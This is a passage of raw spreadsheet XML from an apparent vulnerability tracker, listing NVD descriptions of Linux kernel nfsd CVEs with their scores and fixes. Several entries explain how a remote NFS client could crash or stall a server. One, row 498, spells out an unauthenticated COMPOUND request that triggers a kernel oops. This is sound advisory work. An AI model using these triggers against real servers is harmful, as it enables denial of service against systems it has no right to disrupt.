released once the OPEN compound finishes.
When nfsd4_decode_open_claim4() returns a non-seqid-mutating error,
the dispatcher short-circuits before op_func runs:
    nfsd4_proc_compound()
      if (op-&gt;status &amp;&amp; op-&gt;opnum == OP_OPEN)
          op-&gt;status = nfsd4_open_omfg(...)
              if (!seqid_mutating_err(ntohl(op-&gt;status)))
                  return op-&gt;status;   /* nfsd4_open() never runs */
      ...
      opdesc-&gt;op_release(&amp;op-&gt;u)  /* must still release op_pacl/op_dpacl */
Before this change OP_OPEN had no .op_release in nfsd4_ops[], and the
release pair lived inside nfsd4_open() at its out_err: label. On the
short-circuit path nfsd4_open() is never invoked, so both posix_acl
refs leak on every malformed OPEN compound that carries valid POSIX
ACL createhow4 attributes.
Add nfsd4_open_release() and wire it as .op_release for OP_OPEN.
posix_acl_release() is NULL-safe, so the single release site covers
both the normal path and the nfsd4_open_omfg short-circuit. Remove
the matching posix_acl_release() pair from nfsd4_open()'s out_err:
label to avoid double-releasing.
The compound loop has two encoding branches: nfsd4_encode_operation()
for normal ops, and nfsd4_encode_replay() for v4.0 replayed ops.
op_release was only called from nfsd4_encode_operation(), so resources
attached to op-&gt;u leak on the replay path.
Move the op_release() call out of nfsd4_encode_operation() and the
replay branch, placing it after the if-else in nfsd4_proc_compound().
This gives a single call site in a fairly obviously-correct place,
covering both the normal encoding and replay paths.</t>
        </is>
      </c>
      <c r="S496" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89664</t>
        </is>
      </c>
    </row>
    <row r="497">
      <c r="A497" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B497" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C497" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89678</t>
        </is>
      </c>
      <c r="D497" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E497" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F497" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G497" s="5" t="inlineStr"/>
      <c r="H497" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I497" s="5" t="inlineStr"/>
      <c r="J497" s="5" t="inlineStr"/>
      <c r="K497" s="5" t="inlineStr"/>
      <c r="L497" s="5" t="inlineStr"/>
      <c r="M497" s="5" t="inlineStr"/>
      <c r="N497" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O497" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P497" s="5" t="inlineStr"/>
      <c r="Q497" s="5" t="inlineStr"/>
      <c r="R497" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
nfsd: fix partial-write detection in nfsd_direct_write
nfsd_direct_write() walks a list of write segments and, after each
vfs_iocb_iter_write(), tries to detect a short write so the loop can
stop before placing the next segment at a wrong file offset:
    host_err = vfs_iocb_iter_write(file, kiocb, &amp;segments[i].iter);
    if (host_err &lt; 0)
            return host_err;
    *cnt += host_err;
    if (host_err &lt; segments[i].iter.count)
            break;	/* partial write */
vfs_iocb_iter_write() runs the iter through -&gt;write_iter(), which
advances the iter by the number of bytes written. By the time the
check runs, segments[i].iter.count is the residual, not the original
request length:
    before write_iter: iter.count == original_len
    after  write_iter: iter.count == original_len - host_err
The condition then reduces to host_err &lt; original_len - host_err, so
the break fires only when less than half of the segment was written.
Any short write completing between 50% and 99% of the segment slips
through; the loop advances to the next segment with kiocb-&gt;ki_pos
only bumped by the short amount, writing the next segment's payload
at the wrong offset and over-reporting *cnt to the NFS client.
Snapshot the segment's byte count before the write and compare
host_err against that snapshot so any short write breaks the loop.</t>
        </is>
      </c>
      <c r="S497" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89678</t>
        </is>
      </c>
    </row>
    <row r="498">
      <c r="A498" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B498" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C498" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89679</t>
        </is>
      </c>
      <c r="D498" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E498" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F498" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G498" s="5" t="inlineStr"/>
      <c r="H498" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="I498" s="5" t="inlineStr"/>
      <c r="J498" s="5" t="inlineStr"/>
      <c r="K498" s="5" t="inlineStr"/>
      <c r="L498" s="5" t="inlineStr"/>
      <c r="M498" s="5" t="inlineStr"/>
      <c r="N498" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O498" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P498" s="5" t="inlineStr"/>
      <c r="Q498" s="5" t="inlineStr"/>
      <c r="R498" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
nfsd: fix null dereference in nfsd4_setattr for deleg timestamp attrs
When a SETATTR request includes FATTR4_WORD2_TIME_DELEG_ACCESS or
FATTR4_WORD2_TIME_DELEG_MODIFY in the attribute bitmap, nfsd4_setattr()
sets deleg_attrs=true and calls nfs4_preprocess_stateid_op() to validate
the stateid.
If the client supplies the NFSv4 "one stateid" (all-0xFF bytes),
check_special_stateids() returns nfs_ok without populating the output
nfs4_stid pointer, because the special-stateid path in
nfs4_preprocess_stateid_op() jumps to done: with s==NULL, and the
"if (s)" block that would set *cstid is skipped. The local variable `st`
remains NULL.
Back in nfsd4_setattr(), the if (deleg_attrs) block then unconditionally
dereferences st-&gt;sc_type (at offset 4 from NULL), causing a kernel oops.
This is remotely triggerable by any NFSv4 client: send COMPOUND [PUTROOTFH,
SETATTR(ONE_STATEID, {bmval2=FATTR4_WORD2_TIME_DELEG_ACCESS, ...})].
No authentication, delegation, or prior state is required.
Fix by adding a NULL check before the dereference. A special stateid is
not a delegation stateid, so the existing nfserr_bad_stateid return value
is already correct; we only need to guard the pointer dereference itself.</t>
        </is>
      </c>
      <c r="S498" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89679</t>
        </is>
      </c>
    </row>
    <row r="499">
      <c r="A499" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B499" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C499" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89680</t>
        </is>
      </c>
      <c r="D499" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E499" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F499" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G499" s="5" t="inlineStr"/>
      <c r="H499" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="I499" s="5" t="inlineStr"/>
      <c r="J499" s="5" t="inlineStr"/>
      <c r="K499" s="5" t="inlineStr"/>
      <c r="L499" s="5" t="inlineStr"/>
      <c r="M499" s="5" t="inlineStr"/>
      <c r="N499" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O499" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P499" s="5" t="inlineStr"/>
      <c r="Q499" s="5" t="inlineStr"/>
      <c r="R499" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
nfsd: fix nfsd_file leak on inter-server COPY setup failure
When nfsd4_setup_inter_ssc() fails, nfsd4_copy() returns
nfserr_offload_denied directly, bypassing the out: label where
release_copy_files() would drop the nf_dst reference taken by
nfs4_preprocess_stateid_op(). Each failed inter-server COPY
leaks one nfsd_file, pinning file/inode/dentry/vfsmount.
Fix by setting status and jumping to out: instead of returning
directly.</t>
        </is>
      </c>
      <c r="S499" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89680</t>
        </is>
      </c>
    </row>
    <row r="500">
      <c r="A500" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B500" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C500" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89684</t>
        </is>
      </c>
      <c r="D500" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E500" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F500" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G500" s="5" t="inlineStr"/>
      <c r="H500" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I500" s="5" t="inlineStr"/>
      <c r="J500" s="5" t="inlineStr"/>
      <c r="K500" s="5" t="inlineStr"/>
      <c r="L500" s="5" t="inlineStr"/>
      <c r="M500" s="5" t="inlineStr"/>
      <c r="N500" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O500" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P500" s="5" t="inlineStr"/>
      <c r="Q500" s="5" t="inlineStr"/>
      <c r="R500" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
nfsd: fix cpntf publish race in nfs4_init_cp_state
nfs4_alloc_init_cpntf_state() published the new cpntf entry into the
s2s_cp_stateids IDR (with cs_type set) in one s2s_cp_lock section, then
took the lock again to list_add() it onto p_stid-&gt;sc_cp_list. In the gap
the entry is reachable by so_id but cp_list is still {NULL,NULL} from
kzalloc. A racing OFFLOAD_CANCEL (so_id is echoed to the client as
cnr_stateid, so any NFSv4.2 client can drive it) reaches
manage_cpntf_state() -&gt; _free_cpntf_state_locked() and does list_del() on
the zeroed list_head, oopsing the server.
Fold the cs_type assignment and the list_add() into the same critical
section as idr_alloc_cyclic(), so a concurrent lookup either misses the
entry or sees a fully linked cp_list. INIT_LIST_HEAD() the entry after
allocation and switch _free_cpntf_state_locked() to list_del_init() so a
stale unlink is a no-op. nfs4_init_copy_state() passes NULL p_stid and
skips the list_add, preserving NFS4_COPY_STID semantics.</t>
        </is>
      </c>
      <c r="S500" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89684</t>
        </is>
      </c>
    </row>
    <row r="501">
      <c r="A501" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B501" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C501" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89685</t>
        </is>
      </c>
      <c r="D501" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E501" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F501" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G501" s="5" t="inlineStr"/>
      <c r="H501" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I501" s="5" t="inlineStr"/>
      <c r="J501" s="5" t="inlineStr"/>
      <c r="K501" s="5" t="inlineStr"/>
      <c r="L501" s="5" t="inlineStr"/>
      <c r="M501" s="5" t="inlineStr"/>
      <c r="N501" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O501" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P501" s="5" t="inlineStr"/>
      <c r="Q501" s="5" t="inlineStr"/>
      <c r="R501" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
nfsd: fix clock domain mismatch in clients_still_reclaiming()
clients_still_reclaiming() computes a deadline from nn-&gt;boot_time
(CLOCK_REALTIME, ~1.7 billion) but compares it against
ktime_get_boottime_seconds() (CLOCK_BOOTTIME, seconds since boot).
The comparison is always false — it would take ~54 years of uptime
for BOOTTIME to exceed the REALTIME-derived deadline.
This means any client can hold the server in grace indefinitely by
sending CLAIM_PREVIOUS OPEN requests, blocking all non-reclaim
operations for all other clients.
Add boot_time_bt (CLOCK_BOOTTIME) alongside the existing boot_time
and use it for the deadline computation. boot_time (CLOCK_REALTIME)
is preserved for its cl_boot clientid-nonce role.</t>
        </is>
      </c>
      <c r="S501" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89685</t>
        </is>
      </c>
    </row>
    <row r="502">
      <c r="A502" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B502" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C502" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89687</t>
        </is>
      </c>
      <c r="D502" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E502" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F502" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G502" s="5" t="inlineStr"/>
      <c r="H502" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I502" s="5" t="inlineStr"/>
      <c r="J502" s="5" t="inlineStr"/>
      <c r="K502" s="5" t="inlineStr"/>
      <c r="L502" s="5" t="inlineStr"/>
      <c r="M502" s="5" t="inlineStr"/>
      <c r="N502" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O502" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P502" s="5" t="inlineStr"/>
      <c r="Q502" s="5" t="inlineStr"/>
      <c r="R502" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
nfsd: ensure nfsd_file_do_acquire() does not use a non-opened file
-&gt;atomic_open is permitted to return success without actually opening
the file.  It indicates this by calling finish_no_open().
This means dentry_create() can return a file which hasn't been opened.
This is extremely unlikely as -&gt;atomic_open handlers typically
use finish_no_open() only for already existing files, and dentry_create()
isn't called in that case, and the parent being locked should prevent
races.
However out of an abundance of caution it seems wise to teach nfsd to
only use the file returned by dentry_create() if FMODE_OPENED is set,
indicating that it has in fact been opened.</t>
        </is>
      </c>
      <c r="S502" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89687</t>
        </is>
      </c>
    </row>
    <row r="503">
      <c r="A503" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B503" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C503" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89692</t>
        </is>
      </c>
      <c r="D503" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E503" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F503" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G503" s="5" t="inlineStr"/>
      <c r="H503" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I503" s="5" t="inlineStr"/>
      <c r="J503" s="5" t="inlineStr"/>
      <c r="K503" s="5" t="inlineStr"/>
      <c r="L503" s="5" t="inlineStr"/>
      <c r="M503" s="5" t="inlineStr"/>
      <c r="N503" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O503" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P503" s="5" t="inlineStr"/>
      <c r="Q503" s="5" t="inlineStr"/>
      <c r="R503" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
nfsd: clear CALLBACK_RUNNING on failed delegation recall queue
nfsd_break_one_deleg() sets NFSD4_CALLBACK_RUNNING via test_and_set_bit
at entry to serialize recall work, then calls nfsd4_run_cb() to queue
the recall.  When the queue attempt fails the refcount bump is undone,
but the RUNNING bit is left set.  The only site that clears the bit is
nfsd41_destroy_cb() (fs/nfsd/nfs4callback.c), which runs from the
workqueue and is therefore unreachable when nothing was queued.
The bit becomes a permanent latch on dp-&gt;dl_recall.cb_flags: every
subsequent break_lease() on the same delegation hits the early-return
guard in nfsd_break_one_deleg() and silently skips the recall, so the
delegation is never broken and the conflicting open or lock stalls.
Fix by clearing NFSD4_CALLBACK_RUNNING on the !queued branch alongside
the refcount_dec.</t>
        </is>
      </c>
      <c r="S503" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89692</t>
        </is>
      </c>
    </row>
    <row r="504">
      <c r="A504" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B504" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C504" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89695</t>
        </is>
      </c>
      <c r="D504" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E504" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F504" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G504" s="5" t="inlineStr"/>
      <c r="H504" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I504" s="5" t="inlineStr"/>
      <c r="J504" s="5" t="inlineStr"/>
      <c r="K504" s="5" t="inlineStr"/>
      <c r="L504" s="5" t="inlineStr"/>
      <c r="M504" s="5" t="inlineStr"/>
      <c r="N504" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O504" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P504" s="5" t="inlineStr"/>
      <c r="Q504" s="5" t="inlineStr"/>
      <c r="R504" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
nfsd: cap decoded POSIX ACL count to bound sort cost
nfsd4_decode_posixacl() reads a u32 entry count off the wire and passes
it straight to posix_acl_alloc() and sort_pacl_range(). The latter is
an O(n^2) bubble sort, so a client-chosen count drives unbounded CPU in
the server's compound processing path.
    nfsd4_decode_posixacl()
      xdr_stream_decode_u32(&amp;count)       /* uncapped u32 */
      posix_acl_alloc(count, GFP_KERNEL)
      sort_pacl_range(*acl, 0, count - 1) /* O(n^2) bubble sort */
The encoder side in the same file already rejects ACLs whose a_count
exceeds NFS_ACL_MAX_ENTRIES, but the decoder introduced in commit
5fc51dfc2eb1 ("NFSD: Add support for XDR decoding POSIX draft ACLs")
omitted the symmetric check.
Fix by rejecting a wire count greater than NFS_ACL_MAX_ENTRIES with
nfserr_inval, before any allocation, so the sort is bounded by
NFS_ACL_MAX_ENTRIES^2 comparisons.
While we're in here, also fix the nfserr_resource return if
posix_acl_alloc() fails. That's not a legal error code for v4.1+. Change
it to return nfserr_jukebox as that's more appropriate for memory
allocation failures.</t>
        </is>
      </c>
      <c r="S504" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89695</t>
        </is>
      </c>
    </row>
    <row r="505">
      <c r="A505" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B505" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C505" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89696</t>
        </is>
      </c>
      <c r="D505" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E505" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F505" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G505" s="5" t="inlineStr"/>
      <c r="H505" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="I505" s="5" t="inlineStr"/>
      <c r="J505" s="5" t="inlineStr"/>
      <c r="K505" s="5" t="inlineStr"/>
      <c r="L505" s="5" t="inlineStr"/>
      <c r="M505" s="5" t="inlineStr"/>
      <c r="N505" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O505" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P505" s="5" t="inlineStr"/>
      <c r="Q505" s="5" t="inlineStr"/>
      <c r="R505" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
nfsd: block non-SAVEFH ops after FOREIGN PUTFH to prevent NULL deref
When CONFIG_NFSD_V4_2_INTER_SSC is enabled, nfsd4_putfh() can return
success with fh_dentry and fh_export both NULL if fh_verify() returns
nfserr_stale and putfh-&gt;no_verify is true. The NFSD4_FH_FOREIGN flag
is set, but the compound dispatch loop only uses this flag to bypass
the nfserr_nofilehandle check -- it does not prevent subsequent ops
from running with a NULL fh_dentry.
A remote client can exploit this by crafting a COMPOUND that includes
an inter-SSC COPY (which causes check_if_stalefh_allowed() to set
no_verify=true on the saved PUTFH) with an additional op inserted
between the source PUTFH and SAVEFH. For example, SETATTR calls
fh_want_write() which dereferences fh_export-&gt;ex_path.mnt without
calling fh_verify() first, causing a NULL pointer dereference in the
nfsd kthread.
Fix this by gating the dispatch loop: when NFSD4_FH_FOREIGN is set
and fh_dentry is NULL, only OP_SAVEFH (needed for the inter-SSC flow)
and ops with ALLOWED_WITHOUT_FH (which don't need a resolved
filehandle) may proceed. All other ops receive nfserr_stale, per
RFC 7862 Section 15.2.3 which specifies that foreign filehandle
validation is deferred to the consuming operation and NFS4ERR_STALE
returned at that point.</t>
        </is>
      </c>
      <c r="S505" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89696</t>
        </is>
      </c>
    </row>
    <row r="506">
      <c r="A506" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B506" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C506" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89699</t>
        </is>
      </c>
      <c r="D506" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E506" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F506" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G506" s="5" t="inlineStr"/>
      <c r="H506" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I506" s="5" t="inlineStr"/>
      <c r="J506" s="5" t="inlineStr"/>
      <c r="K506" s="5" t="inlineStr"/>
      <c r="L506" s="5" t="inlineStr"/>
      <c r="M506" s="5" t="inlineStr"/>
      <c r="N506" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O506" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P506" s="5" t="inlineStr"/>
      <c r="Q506" s="5" t="inlineStr"/>
      <c r="R506" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
nfsd: validate symlink target length in NFSv4 CREATE
nfsd4_decode_create() accepts an unbounded cr_datalen from the wire for
NF4LNK symlink targets, allowing a client to force a kmalloc of up to
the maximum RPC payload size (several MiB) per COMPOUND op that persists
until compound teardown.  The VFS rejects oversized targets with
ENAMETOOLONG, but the allocation has already occurred.
Reject cr_datalen == 0 early with nfserr_inval and cr_datalen greater
than NFS4_MAXPATHLEN (PATH_MAX) with nfserr_nametoolong to bound the
allocation.</t>
        </is>
      </c>
      <c r="S506" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89699</t>
        </is>
      </c>
    </row>
    <row r="507">
      <c r="A507" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B507" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C507" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89704</t>
        </is>
      </c>
      <c r="D507" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E507" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F507" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G507" s="5" t="inlineStr"/>
      <c r="H507" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I507" s="5" t="inlineStr"/>
      <c r="J507" s="5" t="inlineStr"/>
      <c r="K507" s="5" t="inlineStr"/>
      <c r="L507" s="5" t="inlineStr"/>
      <c r="M507" s="5" t="inlineStr"/>
      <c r="N507" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O507" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P507" s="5" t="inlineStr"/>
      <c r="Q507" s="5" t="inlineStr"/>
      <c r="R507" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
nfsd: sample writeback error cursor before async COPY loop
_nfsd_copy_file_range() samples dst-&gt;f_wb_err into "since"
after the copy loop, then uses it to detect writeback errors
via filemap_check_wb_err() once vfs_fsync_range() returns.
Because the nfsd_file cache reuses a single struct file
across requests targeting the same inode, a concurrent
COMMIT or stable WRITE on dst advances dst-&gt;f_wb_err to the
current mapping-&gt;wb_err via file_check_and_advance_wb_err()
during its own vfs_fsync_range(). If that advancement lands
between the writeback error appearing in mapping-&gt;wb_err
and the COPY worker sampling "since", the worker captures
the already-advanced cursor, errseq_check() sees cur ==
since and returns zero, and NFSD4_COPY_F_COMMITTED is set
even though writeback failed. CB_OFFLOAD then encodes
wr_stable_how = FILE_SYNC4, the client treats the copied
data as durable, and the failure becomes silent data loss.
Sample since once at the start of the function. The cursor
then reflects state in effect before this COPY issues any
writes, and filemap_check_wb_err() detects any error that
occurs during the copy regardless of which thread first
observes it. This matches the pattern used by
nfsd_vfs_write() and nfsd4_clone_file_range().</t>
        </is>
      </c>
      <c r="S507" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89704</t>
        </is>
      </c>
    </row>
    <row r="508">
      <c r="A508" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B508" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C508" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89706</t>
        </is>
      </c>
      <c r="D508" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E508" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F508" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G508" s="5" t="inlineStr"/>
      <c r="H508" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I508" s="5" t="inlineStr"/>
      <c r="J508" s="5" t="inlineStr"/>
      <c r="K508" s="5" t="inlineStr"/>
      <c r="L508" s="5" t="inlineStr"/>
      <c r="M508" s="5" t="inlineStr"/>
      <c r="N508" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O508" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P508" s="5" t="inlineStr"/>
      <c r="Q508" s="5" t="inlineStr"/>
      <c r="R508" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
nfsd: Reset write verifier when async COPY writeback fails
Async COPY captures nn-&gt;writeverf at request time and reports it to
the client via CB_OFFLOAD after the worker kthread completes. When
the post-copy vfs_fsync_range() or filemap_check_wb_err() in
_nfsd_copy_file_range() reports an error, the worker correctly
leaves NFSD4_COPY_F_COMMITTED clear so that CB_OFFLOAD encodes
wr_stable_how as NFS_UNSTABLE, but the server's write verifier is
not rotated.
A client that receives NFS_UNSTABLE in CB_OFFLOAD follows up with
COMMIT to make the copied data durable. With the verifier
unchanged, COMMIT returns the same value the client just received
via CB_OFFLOAD, and the client concludes the copy is durable --
silently dropping the data whose writeback in fact failed. This
violates the UNSTABLE+COMMIT durability contract (RFC 7862 section
15.1, RFC 8881 section 18.32) and matches the bug just fixed in
nfsd_vfs_write() and nfsd_commit().
Rotate nn-&gt;writeverf at the writeback-failure site. The async COPY
worker has no svc_rqst, so commit_reset_write_verifier() is not
available here; calling nfsd_reset_write_verifier() directly
mirrors the trace-less reset already used by
nfsd_file_check_write_error() for the same purpose. Filter out
-EAGAIN and -ESTALE, matching commit_reset_write_verifier(), since
neither indicates a durable-storage failure.</t>
        </is>
      </c>
      <c r="S508" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89706</t>
        </is>
      </c>
    </row>
    <row r="509">
      <c r="A509" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
